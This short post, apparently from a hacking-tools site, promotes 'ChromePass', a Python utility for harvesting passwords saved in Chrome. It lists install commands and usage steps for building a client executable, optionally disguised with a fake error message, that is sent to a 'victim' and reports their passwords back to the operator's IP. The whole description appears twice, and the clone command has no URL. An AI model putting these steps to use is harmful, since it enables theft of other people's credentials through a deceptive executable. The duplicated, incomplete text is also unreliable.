Most users store their passwords right in the browser, in Chrome's so-called "autofill forms".
ChromePass is a specialized utility written in the Python programming language capable of "mining" saved passwords in Chrome.
Installation:
$ git clone
$ cd chromepass
$ pip install -r requirements.txt
$ python -m pip install --upgrade pip
$ python -m pip install -r requirements.txt
Usage:
$ python create_server.py
After starting, select the method - client.exe, enter your IP. If you want, then include an error message, and add a message. The file server-ip.exe - should be received by your victim. Passwords will appear in the client.txt file.
ChromePass is a specialized utility written in the Python programming language capable of "mining" saved passwords in Chrome.
Installation:
$ git clone
$ cd chromepass
$ pip install -r requirements.txt
$ python -m pip install --upgrade pip
$ python -m pip install -r requirements.txt
Usage:
$ python create_server.py
After starting, select the method - client.exe, enter your IP. If you want, then include an error message, and add a message. The file server-ip.exe - should be received by your victim. Passwords will appear in the client.txt file.